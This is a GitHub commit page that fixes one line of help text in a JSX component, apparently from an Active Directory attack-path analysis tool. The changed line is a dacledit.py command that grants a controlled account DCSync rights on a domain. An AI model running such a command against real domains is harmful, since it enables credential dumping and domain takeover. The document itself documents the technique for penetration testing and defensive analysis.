Skip to content

Commit

Permalink
Update LinuxAbuse.jsx
Browse files Browse the repository at this point in the history
Fixing dacledit command to write DCSync right
  • Loading branch information
ShutdownRepo authored Jul 26, 2023
1 parent b60f0db commit e4e5e98
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
Original file line number Diff line number Diff line change
Expand Up @@ -387,7 +387,7 @@ const LinuxAbuse = ({
<pre>
<code>
{
"dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
"dacledit.py -action 'write' -rights 'DCSync' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
}
</code>
</pre>
Expand Down

0 comments on commit e4e5e98

Please sign in to comment.